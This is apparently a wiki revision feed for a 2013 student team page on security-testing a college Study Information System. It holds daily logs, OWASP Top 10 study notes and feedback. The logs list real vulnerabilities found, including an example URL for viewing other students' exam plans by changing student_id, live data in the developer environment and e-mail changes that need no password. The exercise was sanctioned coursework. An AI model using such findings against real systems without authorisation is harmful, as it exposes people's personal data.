===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in a team on a real-life problem.&lt;br /&gt;
** Practising problem-solving and working as a team.&lt;br /&gt;
** Learned a lot of new stuff.&lt;br /&gt;
** Organisation - well done&lt;br /&gt;
** Had a wonderful team!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** A couple of days short of time - as usual...&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** It was nice to meet new people and get new friends from different cultures.&lt;br /&gt;
** Also all the events that was arranged were very funny, specially sauna-event!  &lt;br /&gt;
** Visiting Skype office was something that you don’t get to do everyday!&lt;br /&gt;
** Free food!&lt;br /&gt;
** Everything was well organized and teachers were truly interested about this intensive course!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** First of all, i would like thank you everyone!&lt;br /&gt;
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Not so much free time T.T&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;br /&gt;
* &#039;&#039;&#039;What I did like:&#039;&#039;&#039;&lt;br /&gt;
** Working in teams.&lt;br /&gt;
** Meeting new people.&lt;br /&gt;
** Seeing new places.&lt;br /&gt;
** Learning new things.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I did not like:&#039;&#039;&#039;&lt;br /&gt;
** Too long studying/working days.&lt;br /&gt;
** Brainstorming after whole day of lectures.&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62412</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62412"/>
		<updated>2013-04-05T08:37:53Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Feedback from Sandra Suviste */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
